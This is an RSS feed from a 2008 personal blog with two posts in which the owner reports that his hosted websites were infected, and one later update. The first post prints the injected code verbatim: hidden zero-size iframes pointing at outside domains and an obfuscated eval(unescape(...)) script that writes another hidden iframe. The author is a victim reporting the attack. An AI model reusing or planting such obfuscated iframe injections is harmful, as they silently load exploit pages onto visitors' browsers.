<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Proxyutza blog &#187; trojan</title>
	<atom:link href="http://www.proxyutza.com/tag/trojan/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.proxyutza.com</link>
	<description>About all sorth of things: PHP, Hacks, Scripts, Servers, Linux, Technology, News, Trends</description>
	<lastBuildDate>Wed, 26 May 2010 10:37:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Servage hacked: Exploit-Iframe (Trojan) Infection &#8211; update</title>
		<link>http://www.proxyutza.com/servage-hacked-exploit-iframe-trojan-infection-update/</link>
		<comments>http://www.proxyutza.com/servage-hacked-exploit-iframe-trojan-infection-update/#comments</comments>
		<pubDate>Mon, 10 Mar 2008 15:14:49 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[Hosting]]></category>
		<category><![CDATA[Servage]]></category>
		<category><![CDATA[trojan]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/03/10/servage-hacked-exploit-iframe-trojan-infection-update/</guid>
		<description><![CDATA[several days have passed and my websites are still clean, i hope they stay that way, because i heard about other users hosted on other clusters getting the trojan again and again inserted into their pages. My pages are ok for the moment]]></description>
			<content:encoded><![CDATA[<p>several days have passed and my websites are still clean, i hope they stay that way, because i heard about other users hosted on other clusters getting the trojan again and again inserted into their pages. My pages are ok for the moment</p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/servage-hacked-exploit-iframe-trojan-infection-update/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Servage hacked: Exploit-Iframe (Trojan) Infection</title>
		<link>http://www.proxyutza.com/exploit-iframe-trojan-infection/</link>
		<comments>http://www.proxyutza.com/exploit-iframe-trojan-infection/#comments</comments>
		<pubDate>Fri, 07 Mar 2008 11:56:32 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[Mcafee]]></category>
		<category><![CDATA[trojan]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/03/07/exploit-iframe-trojan-infection/</guid>
		<description><![CDATA[I found this infection on all the blogs i host at Servage, i dont know what caused it, i doubt its my fault because the infection was found in all index.php files trough my websites, and all index.php were writable only by the owner. So i think this might be a hack on Servage&#8217;s servers [...]]]></description>
			<content:encoded><![CDATA[<p>I found this infection on all the blogs i host at Servage, i dont know what caused it, i doubt its my fault because the infection was found in all index.php files trough my websites, and all index.php were writable only by the owner. So i think this might be a hack on Servage&#8217;s servers but they denied it. They also said no one else reported this which i dont believe its true. The infection code is this :</p>
<p>&lt;code&gt;&lt;iframe src=&#8221;http://fredkidns.com/check/upd.php?t=562&#8243; border=&#8221;0&#8243; height=&#8221;0&#8243; width=&#8221;0&#8243;&gt;&lt;/iframe&gt;&lt;/code&gt;<br />
&lt;code&gt;&lt;iframe src=&#8221;http://bestinlive.cn/i/index.php&#8221; border=&#8221;0&#8243; height=&#8221;0&#8243; width=&#8221;0&#8243;&gt;<br />
&lt;/iframe&gt;&lt;script&gt;eval(unescape(&#8220;%77%69%6e%64%6f%77%2e%73%<br />
74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75<br />
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%<br />
61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d%<br />
5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64%<br />
6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2<br />
e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68<br />
%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%<br />
6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64%<br />
63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3<br />
1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6<br />
5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65<br />
%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29&#8243;)); &lt;/script&gt;&lt;/code&gt;</p>
<p>note: the line is so long that i had to insert line breaks<br />
and it was added at the end of each index.php file from my hosting account. I checked the domain names and fredkidns.com its suspended but the other one operates as an online pharmacy, i sent them an email telling about the problem , but i got no reply so far. I havent been able to decode the script to see what it was actually doing, but im sure it was bad. And i forget to tell you the infection was only discovered by Mcafee antiv, bellow is the picture of the error message.</p>
<p><a href="http://www.proxyutza.com/2008/03/07/exploit-iframe-trojan-infection/exploit-iframe-trojan-infection-2/" rel="attachment wp-att-27" title="Exploit-Iframe (Trojan) Infection"><img src="http://www.proxyutza.com/wp-content/uploads/2008/03/mcafee-iframe-trojan.GIF" alt="Exploit-Iframe (Trojan) Infection" height="304" width="404" /></a></p>
<p>I hope this deoesent happen again because i will be forced to change hosting , maybe i will chose hostgator i heard they are very ok.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/exploit-iframe-trojan-infection/feed/</wfw:commentRss>
		<slash:comments>124</slash:comments>
		</item>
	</channel>
</rss>
